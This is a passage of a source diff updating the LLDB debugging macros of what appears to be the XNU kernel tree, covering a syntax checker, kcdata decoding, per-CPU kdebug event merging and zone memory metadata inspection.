IterateQueue(thread_queue_head, thread_ptr_type, 'threads'): + self._terminated_threads_list.append(trd) + caching.SaveDynamicCacheData("kern._terminated_threads_list", self._terminated_threads_list) + return self._terminated_threads_list + if name == 'procs' : self._allproc = caching.GetDynamicCacheData("kern._allproc", []) if len(self._allproc) > 0 : return self._allproc diff --git a/tools/lldbmacros/core/syntax_checker.py b/tools/lldbmacros/core/syntax_checker.py index 02ec68eb5..916f66a07 100755 --- a/tools/lldbmacros/core/syntax_checker.py +++ b/tools/lldbmacros/core/syntax_checker.py @@ -15,6 +15,11 @@ import re tabs_search_rex = re.compile("^\s*\t+",re.MULTILINE|re.DOTALL) +def find_non_ascii(s): + for c in s: + if ord(c) >= 0x80: return True + return False + if __name__ == "__main__": if len(sys.argv) < 2: print >>sys.stderr, "Error: Unknown arguments" @@ -30,13 +35,16 @@ if __name__ == "__main__": fh = open(fname) strdata = fh.readlines() lineno = 0 - tab_check_status = True + syntax_fail = False for linedata in strdata: lineno += 1 if len(tabs_search_rex.findall(linedata)) > 0 : print 
>>sys.stderr, "Error: Found a TAB character at %s:%d" % (fname, lineno) - tab_check_status = False - if tab_check_status == False: + syntax_fail = True + if find_non_ascii(linedata): + print >>sys.stderr, "Error: Found a non ascii character at %s:%d" % (fname, lineno) + syntax_fail = True + if syntax_fail: print >>sys.stderr, "Error: Syntax check failed. Please fix the errors and try again." sys.exit(1) #now check for error in compilation diff --git a/tools/lldbmacros/counter.py b/tools/lldbmacros/counter.py new file mode 100755 index 000000000..200c33727 --- /dev/null +++ b/tools/lldbmacros/counter.py @@ -0,0 +1,24 @@ +from memory import IterateZPerCPU +from xnu import * + +@lldb_type_summary(['scalable_counter_t']) +@header("Counter Value\n-------------") +def GetSimpleCounter(counter): + """ Prints out the value of a percpu counter + params: counter: value - value object representing counter + returns: str - The value of the counter as a string. + """ + val = 0 + for v in IterateZPerCPU(counter, "uint64_t *"): + val += dereference(v) + return str(val) + +@lldb_command('showcounter') +def ShowSimpleCounter(cmd_args=None): + """ Show the value of a percpu counter. + Usage: showcounter <address of counter>
+ """ + if not cmd_args: + raise ArgumentError("Please specify the address of the counter you want to read.") + return + print GetSimpleCounter(kern.GetValueFromAddress(cmd_args[0], "scalable_counter_t")) diff --git a/tools/lldbmacros/ipc.py b/tools/lldbmacros/ipc.py index 4ae6086e6..7f7c65163 100755 --- a/tools/lldbmacros/ipc.py +++ b/tools/lldbmacros/ipc.py @@ -1242,14 +1242,14 @@ def IterateAllPorts(tasklist, func, ctx, include_psets, follow_busyports, should func(t, space, ctx, taskports_idx, 0, t.itk_debug_control, 17) if unsigned(t.itk_task_access) > 0: func(t, space, ctx, taskports_idx, 0, t.itk_task_access, 17) - if unsigned(t.itk_self[1]) > 0: ## task read port - func(t, space, ctx, taskports_idx, 0, t.itk_self[1], 17) - if unsigned(t.itk_self[2]) > 0: ## task inspect port - func(t, space, ctx, taskports_idx, 0, t.itk_self[2], 17) + if unsigned(t.itk_task_ports[1]) > 0: ## task read port + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[1], 17) + if unsigned(t.itk_task_ports[2]) > 0: ## task inspect port + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[2], 17) ## Task name port (not a send right, just a naked ref); TASK_FLAVOR_NAME = 3 - if unsigned(t.itk_self[3]) > 0: - func(t, space, ctx, taskports_idx, 0, t.itk_self[3], 0) + if unsigned(t.itk_task_ports[3]) > 0: + func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[3], 0) ## task resume port is a receive right to resume the task if unsigned(t.itk_resume) > 0: diff --git a/tools/lldbmacros/kasan.py b/tools/lldbmacros/kasan.py index 94f133ccd..7a95127e4 100755 --- a/tools/lldbmacros/kasan.py +++ b/tools/lldbmacros/kasan.py @@ -82,7 +82,7 @@ def print_alloc_free_entry(addr, orig_ptr): leftrz = 16 else: alloc_type = "zone" - leftrz = unsigned(zone.kasan_redzone) + leftrz = unsigned(zone.z_kasan_redzone) else: alloc_type = "kalloc" if asz - usz >= 2*pgsz: diff --git a/tools/lldbmacros/kcdata.py b/tools/lldbmacros/kcdata.py index a17eec8b2..08aa8dbcb 100755 --- a/tools/lldbmacros/kcdata.py 
+++ b/tools/lldbmacros/kcdata.py @@ -16,6 +16,10 @@ import contextlib import base64 import zlib +# can be removed once we move to Python3.1+ +from future.utils.surrogateescape import register_surrogateescape +register_surrogateescape() + class Globals(object): pass G = Globals() @@ -165,6 +169,13 @@ KNOWN_TOPLEVEL_CONTAINER_TYPES = () def enum(**args): return type('enum', (), args) +# +# Decode bytes as UTF-8, using surrogateescape if there are invalid UTF-8 +# sequences; see PEP-383 +# +def BytesToString(b): + return b.decode('utf-8', errors="surrogateescape") + KCSUBTYPE_TYPE = enum(KC_ST_CHAR=1, KC_ST_INT8=2, KC_ST_UINT8=3, KC_ST_INT16=4, KC_ST_UINT16=5, KC_ST_INT32=6, KC_ST_UINT32=7, KC_ST_INT64=8, KC_ST_UINT64=9) @@ -210,7 +221,7 @@ class KCSubTypeElement(object): @staticmethod def FromBinaryTypeData(byte_data): (st_flag, st_type, st_offset, st_size, st_name) = struct.unpack_from('=BBHI32s', byte_data) - st_name = st_name.rstrip('\x00') + st_name = BytesToString(st_name.rstrip('\0')) return KCSubTypeElement(st_name, st_type, st_size, st_offset, st_flag) @staticmethod @@ -238,7 +249,10 @@ class KCSubTypeElement(object): return self.totalsize def GetValueAsString(self, base_data, array_pos=0): - return str(self.GetValue(base_data, array_pos)) + v = self.GetValue(base_data, array_pos) + if isinstance(v, bytes): + return BytesToString(v) + return str(v) def GetValue(self, base_data, array_pos=0): return struct.unpack_from(self.unpack_fmt, base_data[self.offset + (array_pos * self.size):])[0] @@ -499,14 +513,14 @@ class KCObject(object): elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT32_DESC'): self.is_naked_type = True u_d = struct.unpack_from('32sI', self.i_data) - self.i_name = u_d[0].strip(chr(0)) + self.i_name = BytesToString(u_d[0].rstrip('\0')) self.obj = u_d[1] logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name)) elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT64_DESC'): self.is_naked_type = True u_d = struct.unpack_from('32sQ', 
self.i_data) - self.i_name = u_d[0].strip(chr(0)) + self.i_name = BytesToString(u_d[0].rstrip('\0')) self.obj = u_d[1] logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name)) @@ -944,6 +958,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO')] KCSubTypeElement('imageLoadAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 0, 0), KCSubTypeElement('imageUUID', KCSUBTYPE_TYPE.KC_ST_UINT8, KCSubTypeElement.GetSizeForArray(16, 1), 8, 1), KCSubTypeElement('imageSlidBaseAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 24, 0), + KCSubTypeElement('sharedCacheSlidFirstMapping', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 32, 0), ), 'shared_cache_dyld_load_info', legacy_size = 0x18 @@ -1238,6 +1253,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_STACKSHOT_DURATION')] = ( KCSubTypeElement.FromBasicCtype('stackshot_duration', KCSUBTYPE_TYPE.KC_ST_UINT64, 0), KCSubTypeElement.FromBasicCtype('stackshot_duration_outer', KCSUBTYPE_TYPE.KC_ST_UINT64, 8), + KCSubTypeElement.FromBasicCtype('stackshot_duration_prior', KCSUBTYPE_TYPE.KC_ST_UINT64, 16), ), 'stackshot_duration', merge=True ) @@ -1759,30 +1775,6 @@ def RunCommand(bash_cmd_string, get_stderr = True): return (exit_code, output_str) -parser = argparse.ArgumentParser(description="Decode a kcdata binary file.") -parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False, - help="List all known types", - dest="list_known_types") - -parser.add_argument("-s", "--stackshot", required=False, default=False, - help="Generate a stackshot report file", - dest="stackshot_file") - -parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true') - -parser.add_argument("-p", "--plist", required=False, default=False, - help="output as plist", action="store_true") - -parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. 
Default is empty string.", dest="sdk") -parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable") -parser.add_argument("--incomplete", action='store_true', help="accept incomplete data") -parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.") - -class VerboseAction(argparse.Action): - def __call__(self, parser, namespace, values, option_string=None): - logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s') -parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0) - @contextlib.contextmanager def data_from_stream(stream): try: @@ -1858,7 +1850,7 @@ def prettify(data): value = '%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X' % tuple(value) elif 'address' in key.lower() and isinstance(value, (int, long)): value = '0x%X' % value - elif key == 'lr': + elif key == 'lr' or key == 'sharedCacheSlidFirstMapping': value = '0x%X' % value elif key == 'thread_waitinfo': value = map(formatWaitInfo, value) @@ -1876,6 +1868,30 @@ def prettify(data): if __name__ == '__main__': + parser = argparse.ArgumentParser(description="Decode a kcdata binary file.") + parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False, + help="List all known types", + dest="list_known_types") + + parser.add_argument("-s", "--stackshot", required=False, default=False, + help="Generate a stackshot report file", + dest="stackshot_file") + + parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true') + + parser.add_argument("-p", "--plist", required=False, default=False, + help="output as plist", action="store_true") + + parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. 
Default is empty string.", dest="sdk") + parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable") + parser.add_argument("--incomplete", action='store_true', help="accept incomplete data") + parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.") + + class VerboseAction(argparse.Action): + def __call__(self, parser, namespace, values, option_string=None): + logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s') + parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0) + args = parser.parse_args() if args.multiple and args.stackshot_file: diff --git a/tools/lldbmacros/ktrace.py b/tools/lldbmacros/ktrace.py index 80360f650..10848f494 100755 --- a/tools/lldbmacros/ktrace.py +++ b/tools/lldbmacros/ktrace.py @@ -2,7 +2,9 @@ from xnu import * from utils import * from core.lazytarget import * from misc import * +from kcdata import kcdata_item_iterator, KCObject, GetTypeForName, KCCompressedBufferObject from collections import namedtuple +import heapq # From the defines in bsd/sys/kdebug.h: @@ -261,100 +263,118 @@ def ShowKtrace(cmd_args=None): print GetKperfStatus() -class KDCPU(object): - def __init__(self, store, curidx): - self.store = store - self.curidx = curidx - self.oldest_time = None +class KDEvent(object): + """ + Wrapper around kevent pointer that handles sorting logic. + """ + def __init__(self, timestamp, kevent): + self.kevent = kevent + self.timestamp = timestamp + def get_kevent(self): + return self.kevent -def IterateKdebugEvents(): + def __eq__(self, other): + return self.timestamp == other.timestamp + + def __lt__(self, other): + return self.timestamp < other.timestamp + + def __gt__(self, other): + return self.timestamp > other.timestamp + + +class KDCPU(object): """ - Yield events from the in-memory kdebug trace buffers. + Represents all events from a single CPU. 
""" - ctrl = kern.globals.kd_ctrl_page + def __init__(self, cpuid): + self.cpuid = cpuid + self.iter_store = None + + kdstoreinfo = kern.globals.kdbip[cpuid] + self.kdstorep = kdstoreinfo.kd_list_head + + if self.kdstorep.raw == xnudefines.KDS_PTR_NULL: + # Returns an empty iterrator. It will immediatelly stop at + # first call to __next__(). + return - def get_kdstore(kdstorep): + self.iter_store = self.get_kdstore(self.kdstorep) + + # XXX Doesn't have the same logic to avoid un-mergeable events + # (respecting barrier_min and bufindx) as the C code. + + self.iter_idx = self.iter_store.kds_readlast + + def get_kdstore(self, kdstorep): """ See POINTER_FROM_KDSPTR. """ buf = kern.globals.kd_bufs[kdstorep.buffer_index] return addressof(buf.kdsb_addr[kdstorep.offset]) - def get_kdbuf_timestamp(kdbuf): - time_cpu = kdbuf.timestamp - return unsigned(time_cpu) + # Event iterator implementation returns KDEvent instance - if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0: - return + def __iter__(self): + return self - barrier_min = ctrl.oldest_time + def __next__(self): + # This CPU is out of events + if self.iter_store is None: + raise StopIteration - if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0: - # TODO Yield a wrap event with the barrier_min timestamp. - pass + if self.iter_idx == self.iter_store.kds_bufindx: + self.iter_store = None + raise StopIteration - # Set up CPU state for merging events. - ncpus = ctrl.kdebug_cpus - cpus = [] - for cpu in range(ncpus): - kdstoreinfo = kern.globals.kdbip[cpu] - storep = kdstoreinfo.kd_list_head - store = None - curidx = 0 - if storep.raw != xnudefines.KDS_PTR_NULL: - store = get_kdstore(storep) - curidx = store.kds_readlast - # XXX Doesn't have the same logic to avoid un-mergeable events - # (respecting barrier_min and bufindx) as the C code. 
+ keventp = addressof(self.iter_store.kds_records[self.iter_idx]) + timestamp = unsigned(keventp.timestamp) - cpus.append(KDCPU(store, curidx)) + # check for writer overrun + if timestamp < self.iter_store.kds_timestamp: + raise StopIteration - while True: - earliest_time = 0xffffffffffffffff - min_cpu = None - for cpu in cpus: - if not cpu.store: - continue + # Advance iterator + self.iter_idx += 1 - # Check for overrunning the writer, which also indicates the CPU is - # out of events. - if cpu.oldest_time: - timestamp = cpu.oldest_time + if self.iter_idx == xnudefines.EVENTS_PER_STORAGE_UNIT: + snext = self.iter_store.kds_next + if snext.raw == xnudefines.KDS_PTR_NULL: + # Terminate iteration in next loop. Current element is the + # last one in this CPU buffer. + self.iter_store = None else: - timestamp = get_kdbuf_timestamp( - addressof(cpu.store.kds_records[cpu.curidx])) - cpu.oldest_time = timestamp + self.iter_store = self.get_kdstore(snext) + self.iter_idx = self.iter_store.kds_readlast - if timestamp < cpu.store.kds_timestamp: - cpu.store = None - continue + return KDEvent(timestamp, keventp) - if timestamp < earliest_time: - earliest_time = timestamp - min_cpu = cpu + # Python 2 compatibility + def next(self): + return self.__next__() - # Out of events. - if not min_cpu: - return - yield min_cpu.store.kds_records[min_cpu.curidx] - min_cpu.oldest_time = None +def IterateKdebugEvents(): + """ + Yield events from the in-memory kdebug trace buffers. + """ + ctrl = kern.globals.kd_ctrl_page - min_cpu.curidx += 1 - if min_cpu.curidx == xnudefines.EVENTS_PER_STORAGE_UNIT: - next = min_cpu.store.kds_next - if next.raw == xnudefines.KDS_PTR_NULL: - min_cpu.store = None - min_cpu.curidx = None - else: - min_cpu.store = get_kdstore(next) - min_cpu.curidx = min_cpu.store.kds_readlast + if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0: + return + + barrier_min = ctrl.oldest_time - # This CPU is out of events. 
- if min_cpu.curidx == min_cpu.store.kds_bufindx: - min_cpu.store = None - continue + if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0: + # TODO Yield a wrap event with the barrier_min timestamp. + pass + + # Merge sort all events from all CPUs. + cpus = [KDCPU(cpuid) for cpuid in range(ctrl.kdebug_cpus)] + + for event in heapq.merge(*cpus): + yield event.get_kevent() def GetKdebugEvent(event): @@ -476,7 +496,7 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}): continue event = process.ReadMemory( - unsigned(addressof(event)), event_size, error) + unsigned(event), event_size, error) file_offset += event_size f.write(event) written_nevents += 1 @@ -499,12 +519,30 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}): kcdata_length = unsigned(kcdata.kcd_length) if kcdata_addr != 0 and kcdata_length != 0: print('writing stackshot') - f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length)) - file_offset += 16 if verbose: - print('stackshot is {} bytes long'.format(kcdata_length)) print('stackshot starts at offset {}'.format(file_offset)) + print('stackshot is {} bytes long'.format(kcdata_length)) ssdata = process.ReadMemory(kcdata_addr, kcdata_length, error) + magic = struct.unpack('I', ssdata[:4]) + if magic[0] == GetTypeForName('KCDATA_BUFFER_BEGIN_COMPRESSED'): + if verbose: + print('found compressed stackshot') + iterator = kcdata_item_iterator(ssdata) + for item in iterator: + kcdata_buffer = KCObject.FromKCItem(item) + if isinstance(kcdata_buffer, KCCompressedBufferObject): + kcdata_buffer.ReadItems(iterator) + decompressed = kcdata_buffer.Decompress(ssdata) + ssdata = decompressed + kcdata_length = len(ssdata) + if verbose: + print( + 'compressed stackshot is {} bytes long'. 
+ format(kcdata_length)) + + f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length)) + file_offset += 16 + f.write(ssdata) file_offset += kcdata_length if verbose: diff --git a/tools/lldbmacros/mbufs.py b/tools/lldbmacros/mbufs.py index 93e85f759..e9120e03d 100755 --- a/tools/lldbmacros/mbufs.py +++ b/tools/lldbmacros/mbufs.py @@ -39,8 +39,7 @@ def MBufStat(cmd_args=None): (mcs.mbcl_total - total - mcs.mbcl_infree), mcs.mbcl_fail_cnt, mbuf.mtbl_cache.mc_waiter_cnt, mcs.mbcl_notified, mcs.mbcl_purge_cnt, - mbuf.mtbl_maxlimit - ) + mbuf.mtbl_maxlimit) # EndMacro: mbuf_stat # Macro: mbuf_walkpkt diff --git a/tools/lldbmacros/memory.py b/tools/lldbmacros/memory.py index be557e7b8..8f62be956 100755 --- a/tools/lldbmacros/memory.py +++ b/tools/lldbmacros/memory.py @@ -31,18 +31,31 @@ def vm_unpack_pointer(packed, params, type_str = 'void *'): addr >>= 64 - bits - shift return kern.GetValueFromAddress(addr, type_str) -def IterateZPerCPU(root, element_type): +def GetZPerCPU(root, cpu, element_type = None): """ Iterates over a percpu variable params: root - value : Value object for per-cpu variable + cpu - int : the CPU number element_type - str : Type of element returns: one slot """ pagesize = kern.globals.page_size mangle = 1 << (8 * kern.ptrsize - 1) + if element_type is None: + element_type = root.GetSBValue().GetType() + return kern.GetValueFromAddress((int(root) | mangle) + cpu * pagesize, element_type) + +def IterateZPerCPU(root, element_type = None): + """ Iterates over a percpu variable + params: + root - value : Value object for per-cpu variable + element_type - str : Type of element + returns: + one slot + """ for i in range(0, kern.globals.zpercpu_early_count): - yield kern.GetValueFromAddress((int(root) | mangle) + i * pagesize, element_type) + yield GetZPerCPU(root, i, element_type) @lldb_command('showzpcpu', "S") def ShowZPerCPU(cmd_args=None, cmd_options={}): @@ -226,25 +239,24 @@ class ZoneMeta(object): Helper class that helpers walking 
metadata """ - @classmethod - def _looksForeign(cls, addr): - if addr & (kern.globals.page_size - 1): - return False - try: - meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - return meta.zm_foreign_cookie[0] == 0x123456789abcdef - except: - return False - def __init__(self, addr, isPageIndex = False): global kern pagesize = kern.globals.page_size zone_info = kern.GetGlobalVariable('zone_info') - self.zone_map_min = unsigned(zone_info.zi_map_range.min_address) - self.zone_map_max = unsigned(zone_info.zi_map_range.max_address) - self.zone_meta_min = unsigned(zone_info.zi_meta_range.min_address) - self.zone_meta_max = unsigned(zone_info.zi_meta_range.max_address) + def load_range(var): + return (unsigned(var.min_address), unsigned(var.max_address)) + + def in_range(x, r): + return x >= r[0] and x <= r[1] + + FOREIGN = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_FOREIGN') + NATIVE = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_NATIVE') + + self.meta_range = load_range(zone_info.zi_meta_range) + self.native_range = load_range(zone_info.zi_map_range[NATIVE]) + self.foreign_range = load_range(zone_info.zi_map_range[FOREIGN]) + self.addr_base = min(self.foreign_range[0], self.native_range[0]) addr = unsigned(addr) if isPageIndex: @@ -255,86 +267,146 @@ class ZoneMeta(object): self.address = addr - if self.zone_meta_min <= addr and addr < self.zone_meta_max: + if in_range(addr, self.meta_range): self.kind = 'Metadata' - addr -= (addr - self.zone_meta_min) % sizeof('struct zone_page_metadata') + addr -= addr % sizeof('struct zone_page_metadata') self.meta_addr = addr self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - self.page_addr = self.zone_map_min + ((addr - self.zone_meta_min) / sizeof('struct zone_page_metadata') * pagesize) - self.first_offset = 0 - elif self.zone_map_min <= addr and addr < self.zone_map_max: + self.page_addr = self.addr_base + ((addr - self.meta_range[0]) / sizeof('struct zone_page_metadata') * pagesize) 
+ elif in_range(addr, self.native_range) or in_range(addr, self.foreign_range): addr &= ~(pagesize - 1) - page_idx = (addr - self.zone_map_min) / pagesize + page_idx = (addr - self.addr_base) / pagesize self.kind = 'Element' self.page_addr = addr - self.meta_addr = self.zone_meta_min + page_idx * sizeof('struct zone_page_metadata') + self.meta_addr = self.meta_range[0] + page_idx * sizeof('struct zone_page_metadata') self.meta = kern.GetValueFromAddress(self.meta_addr, "struct zone_page_metadata *") - self.first_offset = 0 - elif ZoneMeta._looksForeign(addr): - self.kind = 'Element (F)' - addr &= ~(pagesize - 1) - self.page_addr = addr - self.meta_addr = addr - self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - self.first_offset = 32 # ZONE_FOREIGN_PAGE_FIRST_OFFSET in zalloc.c else: self.kind = 'Unknown' self.meta = None self.page_addr = 0 self.meta_addr = 0 - self.first_offset = 0 + + if self.meta: + self.zone = addressof(kern.globals.zone_array[self.meta.zm_index]) + else: + self.zone = None def isSecondaryPage(self): - return self.meta and self.meta.zm_secondary_page + return self.meta and self.meta.zm_chunk_len >= 0xe def getPageCount(self): - return self.meta and self.meta.zm_page_count or 0 + n = self.meta and self.meta.zm_chunk_len or 0 + if self.zone and self.zone.z_percpu: + n *= kern.globals.zpercpu_early_count + return n + + def getAllocAvail(self): + if not self.meta: return 0 + chunk_len = unsigned(self.meta.zm_chunk_len) + page_size = unsigned(kern.globals.page_size) + return chunk_len * page_size / self.zone.z_elem_size def getAllocCount(self): - return self.meta and self.meta.zm_alloc_count or 0 + if not self.meta: return 0 + return self.meta.zm_alloc_size / self.zone.z_elem_size def getReal(self): if self.isSecondaryPage(): - return ZoneMeta(self.meta - self.meta.zm_page_count) + return ZoneMeta(unsigned(self.meta) - sizeof('struct zone_page_metadata') * unsigned(self.meta.zm_page_index)) return self - def 
getFreeList(self): - if self.meta and self.meta.zm_freelist_offs != unsigned(0xffff): - return kern.GetValueFromAddress(self.page_addr + self.meta.zm_freelist_offs, 'vm_offset_t *') - return 0 + def getElementAddress(self, addr): + meta = self.getReal() + esize = meta.zone.z_elem_size + start = meta.page_addr - def iterateFreeList(self): - cur = self.getFreeList() - while cur: - yield cur + if esize == 0: + return None + + estart = addr - start + return unsigned(start + estart - (estart % esize)) + + def getInlineBitmapChunkLength(self): + if self.zone.z_percpu: + return unsigned(self.zone.z_chunk_pages) + return unsigned(self.meta.zm_chunk_len) + + def getBitmapSize(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return 0 + if self.meta.zm_inline_bitmap: + return -4 * self.getInlineBitmapChunkLength() + return 8 << (unsigned(self.meta.zm_bitmap) & 0x7); + + def getBitmap(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return 0 + if self.meta.zm_inline_bitmap: + return unsigned(addressof(self.meta.zm_bitmap)) + bbase = unsigned(kern.globals.zone_info.zi_bits_range.min_address) + index = unsigned(self.meta.zm_bitmap) & ~0x7 + return bbase + index; + + def getFreeCountSlow(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return self.getAllocAvail() - self.getAllocCount() + + n = 0 + if self.meta.zm_inline_bitmap: + for i in xrange(0, self.getInlineBitmapChunkLength()): + m = kern.GetValueFromAddress(self.meta_addr + i * 16, + 'struct zone_page_metadata *'); + bits = unsigned(m.zm_bitmap) + while bits: + n += 1 + bits &= bits - 1 + else: + bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *') + for i in xrange(0, 1 << (unsigned(self.meta.zm_bitmap) & 0x7)): + bits = unsigned(bitmap[i]) + while bits: + n += 1 + bits &= bits - 1 + return n + + def isElementFree(self, addr): + meta = self.meta + + if not meta or self.zone.z_permanent or not 
meta.zm_chunk_len: + return True + + start = self.page_addr + esize = self.zone.z_elem_size + eidx = (addr - start) / esize + + if meta.zm_inline_bitmap: + i = eidx / 32 + m = unsigned(meta) + sizeof('struct zone_page_metadata') * i + bits = kern.GetValueFromAddress(m, meta).zm_bitmap + return (bits & (1 << (eidx % 32))) != 0 - cur = dereference(cast(cur, 'vm_offset_t *')) - cur = unsigned(cur) ^ unsigned(kern.globals.zp_nopoison_cookie) - cur = kern.GetValueFromAddress(cur, 'vm_offset_t *') + else: + bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *') + bits = unsigned(bitmap[eidx / 64]) + return (bits & (1 << (eidx % 64))) != 0 def iterateElements(self): if self.meta is None: return - esize = self.getZone().z_elem_size - offs = self.first_offset - end = kern.globals.page_size - if not self.meta.zm_percpu: - end *= self.meta.zm_page_count + esize = self.zone.z_elem_size + start = 0 + end = unsigned(kern.globals.page_size) * self.meta.zm_chunk_len + end -= end % esize - while offs + esize <= end: - yield kern.GetValueFromAddress(self.page_addr + offs, 'void *') - offs += esize - - def getZone(self): - if self.meta: - return kern.globals.zone_array[self.meta.zm_index] - return None + for offs in xrange(start, end, esize): + yield unsigned(self.page_addr + offs) @lldb_type_summary(['zone_page_metadata']) -@header("{:<18s} {:<18s} {:>8s} {:>8s} {:<18s} {:<20s}".format('ZONE_METADATA', 'FREELIST', 'PG_CNT', 'ALLOC_CNT', 'ZONE', 'NAME')) +@header("{:<20s} {:<10s} {:<10s} {:<24s} {:<20s} {:<20s}".format( + 'METADATA', 'PG_CNT', 'ALLOC_CNT', 'BITMAP', 'ZONE', 'NAME')) def GetZoneMetadataSummary(meta): """ Summarize a zone metadata object params: meta - obj representing zone metadata in the kernel @@ -346,66 +418,73 @@ def GetZoneMetadataSummary(meta): out_str = 'Metadata Description:\n' + GetZoneMetadataSummary.header + '\n' if meta.isSecondaryPage(): - out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}\n".format( - meta.meta_addr, 0, 0, 0, 0, '(fake 
multipage meta)') + out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}\n".format( + meta.meta_addr, 0, 0, 0, 0, 0, '(fake multipage meta)') meta = meta.getReal() - zinfo = meta.getZone() - out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}".format( - meta.meta_addr, meta.getFreeList(), meta.getPageCount(), meta.getAllocCount(), - addressof(zinfo), ZoneName(zinfo)) + out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}".format( + meta.meta_addr, meta.getPageCount(), meta.getAllocCount(), + meta.getBitmap(), meta.getBitmapSize(), meta.zone, ZoneName(meta.zone)) return out_str -@header("{:<18s} {:>10s} {:>18s} {:>18s} {:<10s}".format( - 'ADDRESS', 'TYPE', 'METADATA', 'PAGE_ADDR', 'OFFSET')) +@header("{:<20s} {:<10s} {:<10s} {:<20s} {:<10s}".format( + 'ADDRESS', 'TYPE', 'STATUS', 'PAGE_ADDR', 'OFFSET')) def WhatIs(addr): """ Information about kernel pointer """ global kern meta = ZoneMeta(addr) + estart = None if meta.meta is None: out_str = "Address {:#018x} is outside of any zone map ({:#018x}-{:#018x})\n".format( - addr, meta.zone_map_min, meta.zone_map_max) + addr, meta.native_range[0], meta.native_range[-1] + 1) else: if meta.kind[0] == 'E': # element page_offset_str = "{:d}/{:d}K".format( addr - meta.page_addr, kern.globals.page_size / 1024) + estart = meta.getElementAddress(addr) + if estart is None: + status = "Unattributed" + elif meta.isElementFree(estart): + status = "Free" + else: + status = "Allocated" else: page_offset_str = "-" + status = "-" out_str = WhatIs.header + '\n' - out_str += "{meta.address:#018x} {meta.kind:>10s} {meta.meta_addr:#018x} {meta.page_addr:#018x} {:<10s}\n\n".format( - page_offset_str, meta=meta) + out_str += "{meta.address:<#20x} {meta.kind:<10s} {status:<10s} {meta.page_addr:<#20x} {:<10s}\n\n".format( + page_offset_str, meta=meta, status=status) out_str += GetZoneMetadataSummary(meta) + '\n\n' print out_str - if meta.kind[0] == 'E': + if estart is not None: print "Hexdump:\n" - meta = 
meta.getReal() - esize = meta.getZone().z_elem_size - start = meta.page_addr - - estart = addr - (start - meta.first_offset) - estart = start + estart - (estart % esize) + meta = meta.getReal() + esize = meta.zone.z_elem_size + start = meta.page_addr + marks = {unsigned(addr): ">"} try: if estart > start: data_array = kern.GetValueFromAddress(estart - 16, "uint8_t *") print_hex_data(data_array[0:16], estart - 16, "") - print "------------------------------------------------------------------" except: pass + print "------------------------------------------------------------------" try: data_array = kern.GetValueFromAddress(estart, "uint8_t *") - print_hex_data(data_array[0:esize], estart, "") + print_hex_data(data_array[0:esize], estart, "", marks) except: + print "*** unable to read memory ***" pass + print "------------------------------------------------------------------" try: - print "------------------------------------------------------------------" data_array = kern.GetValueFromAddress(estart + esize, "uint8_t *") print_hex_data(data_array[0:16], estart + esize, "") except: @@ -423,97 +502,80 @@ def WhatIsHelper(cmd_args=None): # Macro: showzcache @lldb_type_summary(['zone','zone_t']) -@header("{:<18s} {:>5s} {:>10s} {:>12s} {:>12s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s} {:<20s}".format( -'ZONE', 'ELTS', 'D FULL/EMPTY', 'ALLOCS', 'FREES', 'D_SWAP', 'D_FILL', 'D_DRAIN', 'D_GC', 'D_FAIL', 'NAME')) - -def GetZoneCacheSummary(zone, O): - """ Summarize a zone's cache with important information. 
